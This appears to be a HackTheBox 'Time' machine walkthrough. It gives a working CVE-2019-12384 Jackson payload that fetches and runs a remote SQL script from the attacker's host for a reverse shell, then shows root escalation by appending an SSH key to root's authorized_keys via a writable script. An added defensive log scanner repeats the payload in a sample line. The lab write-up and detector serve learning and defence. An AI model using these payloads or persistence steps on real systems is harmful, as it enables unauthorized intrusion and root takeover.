HackTheBox: (“Time”) — Walkthrough
Hi People :D
Today we’ll solve the “Time” machine from HackTheBox, a medium machine that shows how some error messages can be leveraged during exploitation, so let’s get started
TL;DR
— — —
- Ports 80 and 22 are opened
- After inspecting the website functions, I found one that throws a com.fasterxml.jackson.core error when used
- By exploiting CVE-2019-12384, I got a shell as pericles and read the user flag
- After uploading and running LinPEAS, I found the file timer_backup.sh, which is owned by pericles, so we can edit and run it
- Edit timer_backup.sh to make it copy our SSH public key into root’s authorized_keys
- SSH in as root and read the root flag
Enumeration
— — — — — —
Start with Nmap
nmap -A 10.10.10.214
We have two open ports (22 and 80), so let’s look at the website on port 80
Web Enumeration
— — — — — — — —
Navigate to http://10.10.10.214, it’s a JSON Beautifier & Validator
Try writing anything and clicking Process: it gives us null.
Click on the small down arrow; there’s a Validate function, and it says that this function is beta
Now switch to the Validate function, write anything and click Process: it gives an error
Exploitation
— — — — — —
After reading this error, I noticed that com.fasterxml.jackson.core looks interesting, so I searched for an exploit and found this GitHub repo with steps to reproduce
As shown in the image above, we first need to create a file called inject.sql and copy this block of code into it, changing the last line to get a reverse shell, then start a Python HTTP server
In our case we don’t need the Ruby script above; we just need the exploit command, but without all the backslashes (“\”).
User Flag
— — — — —
After removing all backslashes, the command looks like this:
["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://{Your_IP}:8000/inject.sql'"}]
Start a Netcat listener, then paste this command into the website, and we get a shell as pericles
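From the defender’s side, here is an added example (my own code, not part of the original writeup or of the exploit repo) that scans web request logs for the shape of the payload above: a Jackson polymorphic type-hint array naming the logback gadget class, and an H2 JDBC URL carrying a RUNSCRIPT directive. The "client - METHOD path body=..." log format and the ATTACKER_IP placeholder are assumptions, and the sample lines are constructed.

```python
import json

# Gadget class used by this writeup's payload (CVE-2019-12384). The H2 INIT=RUNSCRIPT
# directive in the JDBC url is what fetches and executes the remote inject.sql.
GADGET_CLASSES = {"ch.qos.logback.core.db.DriverManagerConnectionSource"}

def is_type_hint_array(node):
    # Jackson default typing encodes a polymorphic value as ['fq.ClassName', {props}];
    # this is a heuristic, so benign two-element arrays of that shape are flagged too.
    return (isinstance(node, list) and len(node) == 2
            and isinstance(node[0], str) and "." in node[0]
            and isinstance(node[1], dict))

def analyze_body(body):
    """Return findings for one JSON request body (empty list if benign)."""
    findings = []
    try:
        doc = json.loads(body)
    except ValueError:
        return findings  # not JSON: nothing for Jackson to deserialize
    stack = [doc]
    while stack:  # walk nested arrays/objects, not just the root value
        node = stack.pop()
        if is_type_hint_array(node):
            cls, props = node
            kind = "known gadget class" if cls in GADGET_CLASSES else "polymorphic type hint"
            findings.append(f"{kind} {cls}")
            if "RUNSCRIPT FROM" in str(props.get("url", "")).upper():
                findings.append("H2 INIT=RUNSCRIPT in JDBC url")
        if isinstance(node, dict):
            stack.extend(node.values())
        elif isinstance(node, list):
            stack.extend(node)
    return findings

# Constructed sample log lines; ATTACKER_IP is a placeholder, not a real address.
SAMPLE_LOG = [
    '10.10.14.5 - POST /validate body={"name": "test", "ok": true}',
    '10.10.14.5 - POST /validate body=["ch.qos.logback.core.db.DriverManagerConnectionSource", '
    '{"url": "jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM \'http://ATTACKER_IP:8000/inject.sql\'"}]',
    '10.10.14.5 - POST /validate body=not json at all',
]

def scan_log(lines):
    """Return (client, findings) for each log line whose body looks malicious."""
    alerts = []
    for line in lines:
        _, _, body = line.partition("body=")
        findings = analyze_body(body)
        if findings:
            alerts.append((line.split(" ", 1)[0], findings))
    return alerts
```

Running scan_log(SAMPLE_LOG) flags only the second line, with both the gadget class and the RUNSCRIPT finding.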
Upgrade your shell to a proper TTY with these commands:
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=linux
Then navigate to the home directory and read user.txt to get the flag
Root Flag
— — — — —
Let’s upload LinPEAS to automate system and file enumeration, then give it execute permission with chmod +x linpeas.sh
After running LinPEAS, there’s a file called timer_backup.sh in the Backup files section; the interesting thing about this script is that it’s owned by pericles, so we can write to it and execute it
Navigate to /usr/bin and read timer_backup.sh; it contains nothing important
Now we need to edit this script so it copies our SSH public key into root’s authorized_keys, so that we can SSH in as root.
First, generate your SSH key pair with this command:
ssh-keygen -t rsa
Second, copy the contents of id_rsa.pub, then edit timer_backup.sh so it appends our SSH key to root’s authorized_keys; this command does the job:
echo "echo {Your_SSH_PubKey} >> /root/.ssh/authorized_keys" >> /usr/bin/timer_backup.sh
Once the script has copied our key into root’s authorized_keys, just SSH in as root using your generated key:
ssh -i ~/.ssh/id_rsa root@10.10.10.214
And we have successfully SSHed in as root :D Read /root/root.txt to get the root flag
Thanks for reading and I hope you love this writeup ❤